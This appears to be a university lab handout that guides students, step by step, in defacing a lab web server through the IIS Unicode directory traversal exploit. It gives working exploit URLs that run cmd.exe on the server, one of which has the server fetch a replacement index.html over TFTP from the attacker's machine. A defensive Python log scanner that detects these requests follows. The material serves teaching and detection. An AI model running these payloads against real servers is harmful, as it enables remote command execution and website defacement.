Lab Exercise: Defacing a Website using IIS Unicode Exploit and TFTP, Lab Reports of Cryptography and System Security

A lab exercise where students are required to exploit a vulnerable web server using the IIS Unicode exploit and TFTP to deface the target's website. The exercise involves setting up a TFTP server on the attacking box, tricking the webserver into uploading a defaced webpage, and verifying the defacement.

Typology: Lab Reports

Pre 2010

Uploaded on 08/19/2009

koofers-user-9z7

LAB #14 (12/20/2007)

Your assignment, should you choose to accept it…

If any of your force be killed or captured, the secretary will disavow any knowledge of your actions... this tape will self destruct in 5 seconds... Good Luck, Jim

Remote exploitation: Deface a website using a vulnerability and TFTP


Scenario

You have a remote target, an enterprise LAN that is in an un-named country. It is connected to the Internet. You have already determined, using Nessus, that the target's web server is vulnerable to the IIS Unicode exploit. Use the exploit, and the fact that there is, by default, a TFTP client on the server, to deface the target's website.

The target is: www.jkandtc.com

Potential Show Stoppers

1. The vulnerability must be there.
2. The TFTP client must still be there.

For this lab:

n is your number!

n = the number of your laptop. For example, your number is 02 if your laptop number is 02.

NOTE:

What you do in this lab is exactly how over 400 USG web servers were defaced in the year 2000!

So… the attacking box must be a TFTP server

Make sure there is a TFTP server on your box

• A SolarWinds TFTP server icon should be on your desktop
- If not, it should be here: Start/All Programs/SolarWinds 2003 Standard Edition/TFTP Server
- No need to run it yet!
- If it is not installed, install it:
  - Double-click on the c:\tools\solarwinds.exe icon
  - The c:\TFTP-Root directory will be created

How You Do It

To trick the webserver, you will use the IIS directory traversal vulnerability

• It's in every Windows Server 2000 SP
- Open your browser, and enter the URL below
- Enter this in your browser's window:

http://www.jkandtc.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:

Since this must be perfect, copy and paste it from the IIS-ExploitCode.txt file in your tools folder.

Make sure the scripts specify: www.jkandtc.com

1. Deface the course website (cont.)

Now, start the TFTP server on your box

• Double-click on desktop icon: TFTP Server
• Or: Select Start/All Programs/SolarWinds 2003 Standard Edition/TFTP Server
- Then select File/Configure

Configure your TFTP server

- Select the TFTP Root Directory tab to see the TFTP server's root directory.
- C:\TFTP-Root is the default root directory.
- This is the directory used for remote file GETs from your server

You must see this!

OPTIONAL: Open a DOS window and run netstat -a to ensure that the TFTP service is running on Port 69

1. Deface the course website (cont.)

• You're in luck! By default, every W2K Server has a TFTP client installed in its system directory!
• So use the TFTP client to GET files from your server… Use the exploit to have the IIS server GET your new page (the first IP address is that of the victim/webserver).

Do This:

http://www.jkandtc.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+192.168.0.+GET+index.html+c:\inetpub\wwwroot\n\index.html

Your IP address! (callout on the 192.168.0. address)
Your n! (callout on the n in the destination path)

Use the correct IP address of the webserver! Your website on the server is at: c:\inetpub\wwwroot\n\index.html

1. Deface the course website (cont.)

• Re-visit your website on my webserver by… Entering this in your web browser: http://www.jkandtc.com/n/index.html (your n!)
• Is it defaced? YEAH!
• AGAIN: The above was exactly how over 400 USG web servers were defaced in the year 2000!
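Seen from the web server's side, the requests in this lab leave a recognisable trace. The following is an added example, not part of the original lab: a Python check that folds overlong two-byte UTF-8 sequences such as %c1%9c back to ASCII before looking for traversal and cmd.exe requests. The log lines and their simplified field layout are constructed for illustration, and the function names are hypothetical.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample log (assumed layout: date time client-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
2000-10-20 14:02:11 192.0.2.10 GET /default.htm - 200
2000-10-20 14:02:40 192.0.2.77 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir+c: 200
2000-10-20 14:03:05 192.0.2.77 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.77+GET+index.html 200
2000-10-20 14:05:19 192.0.2.31 GET /images/caf%c3%a9.gif - 200
"""

def decode_overlong(raw: bytes):
    """Fold 2-byte overlong UTF-8 (lead byte 0xC0/0xC1) to the ASCII byte it encodes.

    Returns (canonical_bytes, list_of_hidden_characters)."""
    out, hidden, i = bytearray(), [], 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            code = ((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F)  # always < 0x80
            hidden.append(chr(code))
            out.append(code)
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out), hidden

def inspect(line: str):
    """Return (client_ip, reasons) for one log line; reasons is empty if benign."""
    _date, _time, ip, _method, stem, query, _status = line.split()
    canon, hidden = decode_overlong(unquote_to_bytes(stem))
    path = canon.replace(b"\\", b"/").lower()  # treat both separators alike
    reasons = []
    if hidden:
        reasons.append("overlong UTF-8 hiding " + repr("".join(hidden)))
    if b"/../" in path:
        reasons.append("directory traversal in canonical path")
    if path.endswith(b"/cmd.exe"):
        reasons.append("command interpreter requested with args " + query)
    return ip, reasons

def scan(log: str):
    """Return only the suspicious entries as (client_ip, reasons) tuples."""
    return [(ip, why) for ip, why in map(inspect, log.splitlines()) if why]

if __name__ == "__main__":
    for ip, why in scan(SAMPLE_LOG):
        print(ip, "; ".join(why))
```

Lead bytes 0xC0 and 0xC1 never occur in well-formed UTF-8, so their presence in a request path is a high-signal indicator on its own; the legitimate caf%c3%a9 request is not flagged.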

Troubleshooting

Look at your TFTP server window – did it log your copy of index.html being sent to the server?

If not:

1. Make sure you specified the Windows 2000 server as the destination IP address.
2. The source IP address is yours.
3. Your TFTP server's TFTP-Root directory includes index.html
4. The file being transferred is index.html.
5. The index.html on the web server is not read-only

See next slide…